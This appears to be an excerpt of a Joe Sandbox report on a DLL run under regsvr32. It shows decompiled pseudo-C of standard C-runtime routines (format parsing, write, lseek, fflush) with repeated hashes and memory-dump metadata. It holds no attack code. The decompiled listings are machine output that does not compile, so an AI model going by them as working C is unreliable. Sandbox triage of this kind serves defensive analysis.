                                                      				goto __rax;
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                      • Instruction ID: 4e41d9db2091814ce308bd8b3badba688d1355b6a5e36393cab3bd2279fd69d5
                                                      • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                      • Instruction Fuzzy Hash: 01412AB2A0C6C286E7F09B64E8407BEB2E4F384346F600126D6CD876A9DB3ED444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                      				void* _t114;
                                                      				char* _t134;
                                                      
                                                      				_a116 = 0;
                                                      				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                      				_t134 =  &_a1112;
                                                      				_a116 = E000007FE7FEF9D31E40(_t134);
                                                      				if (_a116 >= 0) goto 0xf9d3be14;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3be2d;
                                                      				_a116 = _t114 + _t134 - 0x30;
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-192189897
                                                      • Opcode ID: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                      • Instruction ID: 25f4969c447c8d4d660c638a7323c6370fe89c3a0b7b258112d187f79a668fd6
                                                      • Opcode Fuzzy Hash: 0dcb35cdac88f8f65d488c6c387acf7a3a87c9c5c0c9a15f6f87c725b9d0fc3a
                                                      • Instruction Fuzzy Hash: ED416E72A0DAC28AE3F0DB24E8547BEB7E4E384345F600126D6DD869A9DB7ED140CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                      				void* _t114;
                                                      				char* _t134;
                                                      
                                                      				_a116 = 0;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t134 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t134);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t114 + _t134 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                      • Instruction ID: 6afb929124b84414141dd4680376ccf7afecd9c4b7d6d92296aea7179b7f5a27
                                                      • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                      • Instruction Fuzzy Hash: 024109A2A0C6C286E7F09B64E8447BEB6E4F394346F600126D6CD876A5DB3ED444DF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                                      • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                      • API String ID: 275287319-2412454244
                                                      • Opcode ID: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                      • Instruction ID: f463794f61061979348d28cf0890255f55ae464b61bc66257c006d95a81b41bb
                                                      • Opcode Fuzzy Hash: 9dbe059b54c234531181e61fbc079bb475f6c20a5a1a356ebb7b18ccdd590da7
                                                      • Instruction Fuzzy Hash: A8316372A18B85C6D790CB28E88066E77A1F7857A5F604325E6FE47AF9CB3DD441CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_unlock
                                                      • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2816345473-1282596470
                                                      • Opcode ID: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                      • Instruction ID: 0c290ab1c852a48438f6a901ce88093280091c3cb9967e086700a94ae8aeefb6
                                                      • Opcode Fuzzy Hash: db3a677d4455786e2b88604055b88d75c0eb5ecf603a90f053d8ba1f75c85f5c
                                                      • Instruction Fuzzy Hash: 18313371D1D2428AE3A08B68ED4476E77E0F741364F615236A6CD866F4D77EE4488B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock$_unlock
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                                      • API String ID: 2500497606-1087415141
                                                      • Opcode ID: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                      • Instruction ID: 34f18152e293ad813cf8b9b11c4969fef8ff7405ef187e896dde4a1f66726313
                                                      • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                      • Instruction Fuzzy Hash: 4121FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                      • String ID: csm
                                                      • API String ID: 933340387-1018135373
                                                      • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                      • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                                      • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                      • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-23161695
                                                      • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                      • Instruction ID: f549bc85806da522572ee7890384280d6aac56d4f037a7782e26525923b50f93
                                                      • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                      • Instruction Fuzzy Hash: A2112A71A29606CAF7D0AB14ED5476E72E1F3507C9FA09125E2CD026E4D77EE504CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-3042049227
                                                      • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                      • Instruction ID: 08953b95d21c5f70e3699fefb321eca4419d040150facc41ebc10b04699de718
                                                      • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                      • Instruction Fuzzy Hash: F8115731E0C646DAF7A4AF24EC117AE73D0F780398FA0912692CC026E5DB7EE644CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno_invalid_parameter
                                                      • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 4140903211-1338331675
                                                      • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                      • Instruction ID: 8bdd68c2d8658697f17e3158693f35fff5fb9c26cbdf8bf42c76b87004d789dc
                                                      • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                      • Instruction Fuzzy Hash: F0014CB1A18646C6FB90AB24EC4076D36E0F350358FB04125E28D036F5C7BED544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer__doserrno_invalid_parameter
                                                      • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                      • API String ID: 1098298932-1795423647
                                                      • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                      • Instruction ID: 5ff663975ae3511ed6d2782a661d896beba523f0d1828ccbc0613956f22d1229
                                                      • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                      • Instruction Fuzzy Hash: CBE03960A0890696F6D4AF14EC113EE2290A740788FE14222908D072F2CB7EA605C741
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                      				long long _v24;
                                                      				intOrPtr _v32;
                                                      				long long _v40;
                                                      				signed int _v48;
                                                      				int _v52;
                                                      				int _v56;
                                                      				signed int _v64;
                                                      				long long _v72;
                                                      				long long _t82;
                                                      
                                                      				_a32 = r9d;
                                                      				_a24 = __r8;
                                                      				_a16 = __edx;
                                                      				_a8 = __rcx;
                                                      				_v56 = 0;
                                                      				if (_a48 != 0) goto 0xf9d2f5ab;
                                                      				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                      				if (_a64 == 0) goto 0xf9d2f5bf;
                                                      				_v32 = 9;
                                                      				goto 0xf9d2f5c7;
                                                      				_v32 = 1;
                                                      				_v64 = 0;
                                                      				_v72 = 0;
                                                      				r9d = _a32;
                                                      				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                      				if (_v48 != 0) goto 0xf9d2f60b;
                                                      				goto 0xf9d2f6f8;
                                                      				if (0 != 0) goto 0xf9d2f652;
                                                      				if (_v48 <= 0) goto 0xf9d2f652;
                                                      				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                                      				_t82 = _v48 + _v48 + 0x10;
                                                      				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                                      				_v24 = _t82;
                                                      				goto 0xf9d2f65b;
                                                      				_v24 = 0;
                                                      				_v40 = _v24;
                                                      				if (_v40 != 0) goto 0xf9d2f674;
                                                      				goto 0xf9d2f6f8;
                                                      				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                      				_v64 = _v48;
                                                      				_v72 = _v40;
                                                      				r9d = _a32;
                                                      				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                      				if (_v52 == 0) goto 0xf9d2f6ea;
                                                      				r8d = _v52;
                                                      				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                      				E000007FE7FEF9D2F3E0(_v40);
                                                      				return _v56;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                      • String ID:
                                                      • API String ID: 2618398691-0
                                                      • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                      • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                                      • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                      • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      
                                                      				_a8 = __ecx;
                                                      				_v24 = 0;
                                                      				_v16 = 0;
                                                      				0xf9d29300();
                                                      				_v20 = 0;
                                                      				_v20 = _v20 + 1;
                                                      				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                                      				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                                      				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                                      				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                      				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                                      				if (_a8 != 1) goto 0xf9d3ffe1;
                                                      				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                                      				_v24 = _v24 + 1;
                                                      				goto 0xf9d40024;
                                                      				if (_a8 != 0) goto 0xf9d40024;
                                                      				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                                      				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                                      				_v16 = 0xffffffff;
                                                      				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                      				goto L1;
                                                      				__ecx = 1;
                                                      				__eax = E000007FE7FEF9D29360(__eax, 1);
                                                      				if (_a8 != 1) goto 0xf9d4005b;
                                                      				__eax = _v24;
                                                      				goto 0xf9d4005f;
                                                      				__eax = _v16;
                                                      				return _v16;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                      • String ID:
                                                      • API String ID: 1144694634-0
                                                      • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                      • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                                      • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
